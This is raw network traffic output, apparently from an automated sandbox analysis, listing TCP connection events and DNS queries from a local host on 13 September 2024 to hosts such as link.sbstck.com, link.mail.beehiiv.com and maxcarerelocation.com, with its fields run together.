                                      Sep 13, 2024 15:16:25.041389942 CEST49785443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:25.041415930 CEST49785443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:25.113143921 CEST44349785151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:25.113189936 CEST44349785151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:25.113238096 CEST49785443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:25.113279104 CEST44349785151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:25.113334894 CEST49785443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:25.115648985 CEST44349785151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:25.115678072 CEST44349785151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:25.115756035 CEST49785443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:25.115766048 CEST44349785151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:25.115783930 CEST49785443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:25.115806103 CEST49785443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:25.199290991 CEST44349785151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:25.199357986 CEST44349785151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:25.199428082 CEST49785443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:25.199462891 CEST44349785151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:25.199485064 CEST49785443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:25.199510098 CEST49785443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:25.200792074 CEST44349785151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:25.200850964 CEST44349785151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:25.200881958 CEST49785443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:25.200906992 CEST44349785151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:25.200933933 CEST49785443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:25.200957060 CEST49785443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:25.201658010 CEST44349785151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:25.201725006 CEST49785443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:25.201735020 CEST44349785151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:25.201811075 CEST44349785151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:25.202207088 CEST49785443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:25.204227924 CEST49785443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:25.204258919 CEST44349785151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:25.319138050 CEST49788443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:25.319196939 CEST44349788188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:25.319417953 CEST49788443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:25.320354939 CEST49788443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:25.320374012 CEST44349788188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:25.452085972 CEST44349787188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:25.452799082 CEST49787443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:25.452853918 CEST44349787188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:25.454289913 CEST44349787188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:25.454370975 CEST49787443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:25.454794884 CEST49787443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:25.454871893 CEST44349787188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:25.455063105 CEST49787443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:25.455089092 CEST44349787188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:25.503226995 CEST49787443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:25.790925980 CEST44349788188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:25.792431116 CEST49788443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:25.792468071 CEST44349788188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:25.796179056 CEST44349788188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:25.796258926 CEST49788443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:25.797794104 CEST44349787188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:25.797859907 CEST44349787188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:25.797903061 CEST44349787188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:25.797944069 CEST44349787188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:25.797972918 CEST49787443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:25.797982931 CEST44349787188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:25.798048019 CEST44349787188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:25.798086882 CEST49787443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:25.798110962 CEST49787443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:25.798124075 CEST44349787188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:25.798180103 CEST44349787188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:25.798324108 CEST49787443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:25.804110050 CEST49788443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:25.804143906 CEST49788443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:25.804231882 CEST44349788188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:25.804354906 CEST49788443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:25.804374933 CEST44349788188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:25.804394007 CEST49788443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:25.804435968 CEST49788443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:25.805025101 CEST49789443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:25.805073023 CEST44349789188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:25.805248022 CEST49789443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:25.805865049 CEST49789443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:25.805881977 CEST44349789188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:25.808672905 CEST49787443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:25.808690071 CEST44349787188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:25.903175116 CEST49790443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:25.903240919 CEST44349790151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:25.903321981 CEST49790443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:25.923475981 CEST49790443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:25.923500061 CEST44349790151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:26.262892008 CEST44349789188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:26.312235117 CEST49789443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:26.402497053 CEST44349790151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:26.442434072 CEST49790443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:26.808159113 CEST49789443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:26.808201075 CEST44349789188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:26.808546066 CEST49790443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:26.808588028 CEST44349790151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:26.808862925 CEST44349789188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:26.810241938 CEST44349790151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:26.810312986 CEST49790443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:26.816093922 CEST49789443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:26.816246033 CEST44349789188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:26.816875935 CEST49790443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:26.817130089 CEST44349790151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:26.817148924 CEST49790443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:26.856597900 CEST49789443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:26.863411903 CEST44349790151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:26.872212887 CEST49790443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:26.872227907 CEST44349790151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:26.919116020 CEST49790443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:26.919148922 CEST44349790151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:26.924873114 CEST44349790151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:26.924889088 CEST44349790151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:26.924911976 CEST44349790151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:26.924926043 CEST44349790151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:26.924937010 CEST44349790151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:26.924953938 CEST49790443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:26.924988031 CEST44349790151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:26.925013065 CEST49790443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:26.925019979 CEST44349790151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:26.925041914 CEST49790443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:26.965986013 CEST49790443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:27.008440971 CEST44349790151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:27.008457899 CEST44349790151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:27.008480072 CEST44349790151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:27.008491039 CEST44349790151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:27.008518934 CEST44349790151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:27.008527994 CEST49790443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:27.008534908 CEST44349790151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:27.008572102 CEST49790443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:27.008599997 CEST49790443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:27.015698910 CEST44349790151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:27.015712976 CEST44349790151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:27.015738010 CEST44349790151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:27.015765905 CEST44349790151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:27.015773058 CEST49790443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:27.015784979 CEST44349790151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:27.015821934 CEST49790443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:27.015835047 CEST49790443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:27.097994089 CEST44349790151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:27.098027945 CEST44349790151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:27.098079920 CEST49790443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:27.098097086 CEST44349790151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:27.098131895 CEST49790443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:27.098151922 CEST49790443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:27.100569010 CEST44349790151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:27.100600004 CEST44349790151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:27.100647926 CEST49790443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:27.100656033 CEST44349790151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:27.100687981 CEST49790443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:27.100706100 CEST49790443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:27.105256081 CEST44349790151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:27.105359077 CEST49790443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:27.105366945 CEST44349790151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:27.105384111 CEST44349790151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:27.105437994 CEST49790443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:27.117041111 CEST49790443192.168.2.4151.101.66.137
                                      Sep 13, 2024 15:16:27.117060900 CEST44349790151.101.66.137192.168.2.4
                                      Sep 13, 2024 15:16:41.170152903 CEST44349789188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:41.170314074 CEST44349789188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:41.170394897 CEST49789443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:41.427798033 CEST49789443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:41.427844048 CEST44349789188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:49.607569933 CEST49793443192.168.2.4142.250.185.228
                                      Sep 13, 2024 15:16:49.607609987 CEST44349793142.250.185.228192.168.2.4
                                      Sep 13, 2024 15:16:49.607801914 CEST49793443192.168.2.4142.250.185.228
                                      Sep 13, 2024 15:16:49.608371973 CEST49793443192.168.2.4142.250.185.228
                                      Sep 13, 2024 15:16:49.608385086 CEST44349793142.250.185.228192.168.2.4
                                      Sep 13, 2024 15:16:50.254267931 CEST44349793142.250.185.228192.168.2.4
                                      Sep 13, 2024 15:16:50.254564047 CEST49793443192.168.2.4142.250.185.228
                                      Sep 13, 2024 15:16:50.254589081 CEST44349793142.250.185.228192.168.2.4
                                      Sep 13, 2024 15:16:50.255783081 CEST44349793142.250.185.228192.168.2.4
                                      Sep 13, 2024 15:16:50.256393909 CEST49793443192.168.2.4142.250.185.228
                                      Sep 13, 2024 15:16:50.256567955 CEST44349793142.250.185.228192.168.2.4
                                      Sep 13, 2024 15:16:50.309509993 CEST49793443192.168.2.4142.250.185.228
                                      Sep 13, 2024 15:16:50.731751919 CEST4972480192.168.2.4199.232.214.172
                                      Sep 13, 2024 15:16:50.736978054 CEST8049724199.232.214.172192.168.2.4
                                      Sep 13, 2024 15:16:50.737054110 CEST4972480192.168.2.4199.232.214.172
                                      Sep 13, 2024 15:16:56.891326904 CEST49794443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:56.891413927 CEST44349794188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:56.891614914 CEST49794443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:56.893471956 CEST49794443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:56.893505096 CEST44349794188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:57.349241018 CEST44349794188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:57.349493027 CEST49794443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:57.349528074 CEST44349794188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:57.350536108 CEST44349794188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:57.350594997 CEST49794443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:57.351012945 CEST49794443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:57.351027012 CEST49794443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:57.351075888 CEST44349794188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:57.351083040 CEST49794443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:57.351176023 CEST49794443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:57.351481915 CEST49795443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:57.351577997 CEST44349795188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:57.351655960 CEST49795443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:57.351886034 CEST49795443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:57.351917028 CEST44349795188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:57.830487967 CEST44349795188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:57.830761909 CEST49795443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:57.830797911 CEST44349795188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:57.831779957 CEST44349795188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:57.831834078 CEST49795443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:57.832194090 CEST49795443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:57.832257986 CEST44349795188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:57.873230934 CEST49795443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:57.873259068 CEST44349795188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:57.921655893 CEST49795443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:58.521713972 CEST49796443192.168.2.435.190.80.1
                                      Sep 13, 2024 15:16:58.521745920 CEST4434979635.190.80.1192.168.2.4
                                      Sep 13, 2024 15:16:58.526236057 CEST49796443192.168.2.435.190.80.1
                                      Sep 13, 2024 15:16:58.529494047 CEST49796443192.168.2.435.190.80.1
                                      Sep 13, 2024 15:16:58.529512882 CEST4434979635.190.80.1192.168.2.4
                                      Sep 13, 2024 15:16:59.005017996 CEST4434979635.190.80.1192.168.2.4
                                      Sep 13, 2024 15:16:59.005379915 CEST49796443192.168.2.435.190.80.1
                                      Sep 13, 2024 15:16:59.005394936 CEST4434979635.190.80.1192.168.2.4
                                      Sep 13, 2024 15:16:59.006566048 CEST4434979635.190.80.1192.168.2.4
                                      Sep 13, 2024 15:16:59.006925106 CEST49796443192.168.2.435.190.80.1
                                      Sep 13, 2024 15:16:59.007092953 CEST4434979635.190.80.1192.168.2.4
                                      Sep 13, 2024 15:16:59.007127047 CEST49796443192.168.2.435.190.80.1
                                      Sep 13, 2024 15:16:59.051444054 CEST4434979635.190.80.1192.168.2.4
                                      Sep 13, 2024 15:16:59.059721947 CEST49796443192.168.2.435.190.80.1
                                      Sep 13, 2024 15:16:59.134932041 CEST4434979635.190.80.1192.168.2.4
                                      Sep 13, 2024 15:16:59.135313034 CEST49796443192.168.2.435.190.80.1
                                      Sep 13, 2024 15:16:59.135381937 CEST4434979635.190.80.1192.168.2.4
                                      Sep 13, 2024 15:16:59.135457039 CEST49796443192.168.2.435.190.80.1
                                      Sep 13, 2024 15:16:59.135799885 CEST49797443192.168.2.435.190.80.1
                                      Sep 13, 2024 15:16:59.135845900 CEST4434979735.190.80.1192.168.2.4
                                      Sep 13, 2024 15:16:59.136096954 CEST49797443192.168.2.435.190.80.1
                                      Sep 13, 2024 15:16:59.136153936 CEST49797443192.168.2.435.190.80.1
                                      Sep 13, 2024 15:16:59.136159897 CEST4434979735.190.80.1192.168.2.4
                                      Sep 13, 2024 15:16:59.621697903 CEST4434979735.190.80.1192.168.2.4
                                      Sep 13, 2024 15:16:59.621968031 CEST49797443192.168.2.435.190.80.1
                                      Sep 13, 2024 15:16:59.621992111 CEST4434979735.190.80.1192.168.2.4
                                      Sep 13, 2024 15:16:59.625684023 CEST4434979735.190.80.1192.168.2.4
                                      Sep 13, 2024 15:16:59.625755072 CEST49797443192.168.2.435.190.80.1
                                      Sep 13, 2024 15:16:59.626204967 CEST49797443192.168.2.435.190.80.1
                                      Sep 13, 2024 15:16:59.626348019 CEST49797443192.168.2.435.190.80.1
                                      Sep 13, 2024 15:16:59.626370907 CEST49797443192.168.2.435.190.80.1
                                      Sep 13, 2024 15:16:59.626429081 CEST4434979735.190.80.1192.168.2.4
                                      Sep 13, 2024 15:16:59.668692112 CEST49797443192.168.2.435.190.80.1
                                      Sep 13, 2024 15:16:59.668706894 CEST4434979735.190.80.1192.168.2.4
                                      Sep 13, 2024 15:16:59.716974020 CEST49797443192.168.2.435.190.80.1
                                      Sep 13, 2024 15:16:59.755990982 CEST4434979735.190.80.1192.168.2.4
                                      Sep 13, 2024 15:16:59.756179094 CEST4434979735.190.80.1192.168.2.4
                                      Sep 13, 2024 15:16:59.756237030 CEST49797443192.168.2.435.190.80.1
                                      Sep 13, 2024 15:16:59.756314039 CEST49797443192.168.2.435.190.80.1
                                      Sep 13, 2024 15:16:59.756335020 CEST4434979735.190.80.1192.168.2.4
                                      Sep 13, 2024 15:16:59.756344080 CEST49797443192.168.2.435.190.80.1
                                      Sep 13, 2024 15:16:59.756382942 CEST49797443192.168.2.435.190.80.1
                                      Sep 13, 2024 15:17:00.190222979 CEST44349793142.250.185.228192.168.2.4
                                      Sep 13, 2024 15:17:00.190361977 CEST44349793142.250.185.228192.168.2.4
                                      Sep 13, 2024 15:17:00.193624973 CEST49793443192.168.2.4142.250.185.228
                                      Sep 13, 2024 15:17:01.327738047 CEST49793443192.168.2.4142.250.185.228
                                      Sep 13, 2024 15:17:01.327806950 CEST44349793142.250.185.228192.168.2.4
                                      Sep 13, 2024 15:17:12.826886892 CEST44349795188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:17:12.827043056 CEST44349795188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:17:12.827251911 CEST49795443192.168.2.4188.114.96.3
                                      TimestampSource PortDest PortSource IPDest IP
                                      Sep 13, 2024 15:15:45.152235031 CEST53591721.1.1.1192.168.2.4
                                      Sep 13, 2024 15:15:45.179277897 CEST53596201.1.1.1192.168.2.4
                                      Sep 13, 2024 15:15:46.182270050 CEST53548121.1.1.1192.168.2.4
                                      Sep 13, 2024 15:15:47.082468987 CEST5667253192.168.2.41.1.1.1
                                      Sep 13, 2024 15:15:47.082700014 CEST5951053192.168.2.41.1.1.1
                                      Sep 13, 2024 15:15:47.093983889 CEST53595101.1.1.1192.168.2.4
                                      Sep 13, 2024 15:15:47.095073938 CEST53566721.1.1.1192.168.2.4
                                      Sep 13, 2024 15:15:47.102279902 CEST5319253192.168.2.41.1.1.1
                                      Sep 13, 2024 15:15:47.102408886 CEST5362553192.168.2.41.1.1.1
                                      Sep 13, 2024 15:15:47.113317966 CEST53536251.1.1.1192.168.2.4
                                      Sep 13, 2024 15:15:47.113387108 CEST53531921.1.1.1192.168.2.4
                                      Sep 13, 2024 15:15:48.659291983 CEST6506653192.168.2.41.1.1.1
                                      Sep 13, 2024 15:15:48.659650087 CEST5690153192.168.2.41.1.1.1
                                      Sep 13, 2024 15:15:48.667531013 CEST53650661.1.1.1192.168.2.4
                                      Sep 13, 2024 15:15:48.667552948 CEST53569011.1.1.1192.168.2.4
                                      Sep 13, 2024 15:15:49.572177887 CEST5850353192.168.2.41.1.1.1
                                      Sep 13, 2024 15:15:49.572465897 CEST5696253192.168.2.41.1.1.1
                                      Sep 13, 2024 15:15:49.580104113 CEST53569621.1.1.1192.168.2.4
                                      Sep 13, 2024 15:15:49.582577944 CEST53585031.1.1.1192.168.2.4
                                      Sep 13, 2024 15:15:50.026323080 CEST6248853192.168.2.41.1.1.1
                                      Sep 13, 2024 15:15:50.026323080 CEST5766753192.168.2.41.1.1.1
                                      Sep 13, 2024 15:15:50.046917915 CEST53624881.1.1.1192.168.2.4
                                      Sep 13, 2024 15:15:50.046952009 CEST53576671.1.1.1192.168.2.4
                                      Sep 13, 2024 15:15:51.321113110 CEST5353053192.168.2.41.1.1.1
                                      Sep 13, 2024 15:15:51.321597099 CEST5170453192.168.2.41.1.1.1
                                      Sep 13, 2024 15:15:51.405850887 CEST53517041.1.1.1192.168.2.4
                                      Sep 13, 2024 15:15:51.409809113 CEST53535301.1.1.1192.168.2.4
                                      Sep 13, 2024 15:15:53.672171116 CEST6383353192.168.2.41.1.1.1
                                      Sep 13, 2024 15:15:53.673847914 CEST5186553192.168.2.41.1.1.1
                                      Sep 13, 2024 15:15:53.679152966 CEST53638331.1.1.1192.168.2.4
                                      Sep 13, 2024 15:15:53.680772066 CEST53518651.1.1.1192.168.2.4
                                      Sep 13, 2024 15:15:55.087140083 CEST6202453192.168.2.41.1.1.1
                                      Sep 13, 2024 15:15:55.087583065 CEST5749153192.168.2.41.1.1.1
                                      Sep 13, 2024 15:15:55.088418961 CEST5341653192.168.2.41.1.1.1
                                      Sep 13, 2024 15:15:55.088668108 CEST6402753192.168.2.41.1.1.1
                                      Sep 13, 2024 15:15:55.094017982 CEST53620241.1.1.1192.168.2.4
                                      Sep 13, 2024 15:15:55.094739914 CEST53574911.1.1.1192.168.2.4
                                      Sep 13, 2024 15:15:55.095177889 CEST53534161.1.1.1192.168.2.4
                                      Sep 13, 2024 15:15:55.095457077 CEST53640271.1.1.1192.168.2.4
                                      Sep 13, 2024 15:15:59.144675970 CEST4992853192.168.2.41.1.1.1
                                      Sep 13, 2024 15:15:59.144949913 CEST4966453192.168.2.41.1.1.1
                                      Sep 13, 2024 15:15:59.151509047 CEST53499281.1.1.1192.168.2.4
                                      Sep 13, 2024 15:15:59.151918888 CEST53496641.1.1.1192.168.2.4
                                      Sep 13, 2024 15:16:02.558542013 CEST138138192.168.2.4192.168.2.255
                                      Sep 13, 2024 15:16:04.044912100 CEST53627381.1.1.1192.168.2.4
                                      Sep 13, 2024 15:16:18.862121105 CEST5743253192.168.2.41.1.1.1
                                      Sep 13, 2024 15:16:18.862554073 CEST5244853192.168.2.41.1.1.1
                                      Sep 13, 2024 15:16:18.869329929 CEST53574321.1.1.1192.168.2.4
                                      Sep 13, 2024 15:16:18.869856119 CEST53524481.1.1.1192.168.2.4
                                      Sep 13, 2024 15:16:19.693836927 CEST5857153192.168.2.41.1.1.1
                                      Sep 13, 2024 15:16:19.694559097 CEST5991053192.168.2.41.1.1.1
                                      Sep 13, 2024 15:16:19.701191902 CEST53585711.1.1.1192.168.2.4
                                      Sep 13, 2024 15:16:19.701739073 CEST53599101.1.1.1192.168.2.4
                                      Sep 13, 2024 15:16:19.768282890 CEST5164653192.168.2.41.1.1.1
                                      Sep 13, 2024 15:16:19.768716097 CEST5402253192.168.2.41.1.1.1
                                      Sep 13, 2024 15:16:19.785361052 CEST53540221.1.1.1192.168.2.4
                                      Sep 13, 2024 15:16:19.787015915 CEST53516461.1.1.1192.168.2.4
                                      Sep 13, 2024 15:16:22.884195089 CEST53590541.1.1.1192.168.2.4
                                      Sep 13, 2024 15:16:24.430097103 CEST5481753192.168.2.41.1.1.1
                                      Sep 13, 2024 15:16:24.430274010 CEST6184953192.168.2.41.1.1.1
                                      Sep 13, 2024 15:16:24.437253952 CEST53618491.1.1.1192.168.2.4
                                      Sep 13, 2024 15:16:24.437355995 CEST53548171.1.1.1192.168.2.4
                                      Sep 13, 2024 15:16:24.453233957 CEST6041853192.168.2.41.1.1.1
                                      Sep 13, 2024 15:16:24.453502893 CEST6000753192.168.2.41.1.1.1
                                      Sep 13, 2024 15:16:24.479304075 CEST53604181.1.1.1192.168.2.4
                                      Sep 13, 2024 15:16:24.485083103 CEST53600071.1.1.1192.168.2.4
                                      Sep 13, 2024 15:16:25.872204065 CEST5261953192.168.2.41.1.1.1
                                      Sep 13, 2024 15:16:25.879657984 CEST53526191.1.1.1192.168.2.4
                                      Sep 13, 2024 15:16:25.884850979 CEST5263853192.168.2.41.1.1.1
                                      Sep 13, 2024 15:16:25.892808914 CEST53526381.1.1.1192.168.2.4
                                      Sep 13, 2024 15:16:44.616019011 CEST53530461.1.1.1192.168.2.4
                                      Sep 13, 2024 15:16:46.147738934 CEST53526141.1.1.1192.168.2.4
                                      Sep 13, 2024 15:17:12.830491066 CEST53607951.1.1.1192.168.2.4
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Sep 13, 2024 15:15:47.082468987 CEST192.168.2.41.1.1.10x8ba2Standard query (0)link.sbstck.comA (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:15:47.082700014 CEST192.168.2.41.1.1.10x6f6eStandard query (0)link.sbstck.com65IN (0x0001)false
                                      Sep 13, 2024 15:15:47.102279902 CEST192.168.2.41.1.1.10x2c05Standard query (0)link.sbstck.comA (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:15:47.102408886 CEST192.168.2.41.1.1.10xb382Standard query (0)link.sbstck.com65IN (0x0001)false
                                      Sep 13, 2024 15:15:48.659291983 CEST192.168.2.41.1.1.10x972Standard query (0)link.mail.beehiiv.comA (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:15:48.659650087 CEST192.168.2.41.1.1.10x206fStandard query (0)link.mail.beehiiv.com65IN (0x0001)false
                                      Sep 13, 2024 15:15:49.572177887 CEST192.168.2.41.1.1.10x6352Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:15:49.572465897 CEST192.168.2.41.1.1.10xc133Standard query (0)www.google.com65IN (0x0001)false
                                      Sep 13, 2024 15:15:50.026323080 CEST192.168.2.41.1.1.10x70c9Standard query (0)maxcarerelocation.comA (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:15:50.026323080 CEST192.168.2.41.1.1.10x1601Standard query (0)maxcarerelocation.com65IN (0x0001)false
